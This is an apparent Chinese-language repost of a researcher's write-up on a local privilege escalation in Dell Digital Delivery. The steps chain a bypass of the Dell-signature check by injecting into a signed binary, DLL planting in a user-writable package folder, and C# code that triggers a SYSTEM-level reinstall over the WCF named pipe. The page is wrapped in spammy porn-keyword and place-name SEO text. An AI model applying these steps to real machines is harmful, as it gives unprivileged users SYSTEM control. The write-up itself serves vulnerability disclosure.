91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現Dell Digital Delivery本地提權分析

發布時間:2021-12-22 20:51:08 來源:億速云 閱讀:197 作者:柒染 欄目:網絡安全

本篇文章給大家分享的是有關怎么實現Dell Digital Delivery本地提權分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

下面就講講戴爾數字傳送(以下簡稱為DDD,Dell Digital Delivery)里的這個漏洞是怎么被利用的。至今還沒有人利用這個漏洞造成危害。戴爾已經針對這個漏洞發布了安全報告。

SupportAssist和DDD很復雜,所以漏洞也會很多。如果你對挖掘大型的C#/C++應用里的本地提權漏洞感興趣,可以試試這兩個程序。

Dell’s Digital Delivery是用來安裝軟件的。它可以讓用戶購買、管理軟件,并且DDD預裝在大部分的戴爾電腦上。

Bug

DDD以SYSTEM權限運行,服務名是DeliveryService, 程序名是DeliveryService.exe。DeliveryTray.exe是用戶層面的組件,讓用戶可以對軟件進行管理、安裝。

DeliveryTray和DeliveryService之間的通信是通過一個Windows Communication Foundation (WCF)命名管道進行的。WCF 是兩個進程交換數據的標準方法。像web服務器的REST API一樣,WCF允許服務注冊為處理端并說明主要功能。

Dell.ClientFulfillmentService.Controller.Initialize中對WCF命名管道的初始化如下所示:


this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),

                               typeof(IClientFulfillmentPipeService),

                               "DDDService");

初始化過程調用了 Dell.NamedPipe.StandupServiceHost:


ServiceHost host = null;

string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";

Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());

Tryblock.Run(delegate

{

 host = new ServiceHost(classType, new Uri[]

 {

   realUri

 });

 host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);

 host.Open();

}, null, null);

AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

由apiUrl注冊的服務開始偵聽,AuthenticationManager的singleton負責處理請求。一有請求,AuthenticationManager就將其傳給AuthPipeWorker函數執行以下身份驗證:


string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);

bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);

if (!flag2)

{

   ...

僅當另一端是由戴爾簽名的二進制文件時,請求才會建立連接。

這是在3.1 (我最初測試時候的版本) 和3.5 (現在的最新版, 3.5.1001.0)版本之間加進來的新防護措施,戴爾可能意識到了這里有漏洞點。但這防護還遠遠不夠。我可以通過生成一個由戴爾簽名的二進制文件(例如DeliveryTray.exe)并在其中注入代碼來繞過這個防護措施。注入代碼后,可以訪問特權服務的WCF API。

端點服務由Dell.NamedPipe實現,有十幾個函數。如下所示:


ArchiveAndResetSettings

EnableEntitlements

EnableEntitlementsAsync

GetAppSetting

PingTrayApp

PollEntitlementService

RebootMachine

ReInstallEntitlement

ResumeAllOperations

SetAppSetting

SetAppState

SetEntitlementList

SetUserDownloadChoice

SetWallpaper

ShowBalloonTip

ShutDownApp

UpdateEntitlementUiState

DDD將應用程序安裝包稱為“entitlements”(可以在以上所列函數中找到對應項),安裝/重裝自然就是指那些可以被安裝以及已經安裝好的軟件包。

我第一個研究的函數是 ReInstallEntitlement,顧名思義,它會啟動一個已安裝程序包的重裝進程。代碼實現如下所示:


private static void ReInstallEntitlementThreadStart(object reInstallArgs)

{

   PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;

   PipeServiceClient.TryWcfCall(delegate

   {

       PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);

   }, string.Concat(new object[]

   {

       "ReInstall ",

       ra.EntitlementId,

       " ",

       ra.RunAsUser.ToString()

   }));

}

這個函數通過一個WCF調用將根據請求構建好的參數送到WCF端點。 ReInstallEntitlement有兩個參數: 一個軟件包ID和一個RunAsUser標志(如上所示),都由調用者控制。

在服務端 Dell.ClientFulfillmentService.Controller 管理這些函數的具體實現, OnReInstall 處理重裝進程,它先執行一些完整性檢查、驗證包簽名,然后讓 InstallationManager 將重裝請求壓入任務隊列。 InstallationManager 有一個任務隊列以及檢查新任務的后臺線程( WorkingThread) ,當收到新的安裝請求時就會調用 InstallSoftware

軟件包將緩存到磁盤并等待重新安裝。安裝步驟就不多說了。

將放在 C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ 的安裝包先解壓然后安裝。比如我們安裝 DellDataProtection-SecurityToolsv1.9.1,你就會在任務管理器里看到一個安裝進程:


"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _

Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,

SUPPRESSREBOOT=1\""

此進程的運行用戶由可控制的RunAsUser標志確定,如果設置為False,則使用 SYSTEM權限從 %ProgramData% 目錄中運行。

STSetup 進程的啟動階段,任務管理器中有如下進程:


C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

這里有意思的是,系統中的用戶對父目錄 %ProgramData%\Dell\DigitalDelivery\Downloads\Software都沒有寫入權限,但對安裝包文件夾 DellDataProtection-SecurityTools 有寫入權限。

這讓非特權用戶可以將任意文件放入這個目錄,給了我們使用DLL注入的機會。

漏洞利用

漏洞利用有以下步驟:

將DLL放在適當的 %ProgramData% 軟件包目錄下

啟動運行由Dell簽名的可執行文件的新進程

將C#代碼注入這個進程(運行在無特權的用戶空間中)

從被注入的進程中連接到WCF命名管道

觸發ReInstallEntitlement

步驟4、5可以用下面的C#代碼完成:


PipeServiceClient client = new PipeServiceClient();

client.Initialize();



while (PipeServiceClient.AppState == AppState.Initializing)

 System.Threading.Thread.Sleep(1000);



EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];

PipeServiceClient.ReInstallEntitlement(entitle.ID, false);

System.Threading.Thread.Sleep(30000);



PipeServiceClient.CloseConnection();

上面用到的類是從 NamedPipe.dll導入的。我這里僅僅選擇了第一個可選的軟件包然后重裝,你可能需要遍歷軟件包來確定哪個軟件包的重裝進程會用到你注入的代碼。

我在Github上放出了PoC, 戴爾也已經放出了相應的安全報告。

以上就是怎么實現Dell Digital Delivery本地提權分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

美姑县| 巍山| 大化| 绵阳市| 灵武市| 察雅县| 苍溪县| 浦北县| 绍兴市| 尚志市| 甘泉县| 武陟县| 澎湖县| 饶平县| 若羌县| 大同县| 滨州市| 象州县| 洛南县| 喀什市| 竹北市| 满洲里市| 泗水县| 军事| 公主岭市| 平潭县| 利辛县| 嵊州市| 庐江县| 沛县| 淳安县| 阜平县| 和政县| 惠水县| 高州市| 安岳县| 北海市| 抚顺县| 商南县| 淮北市| 西充县|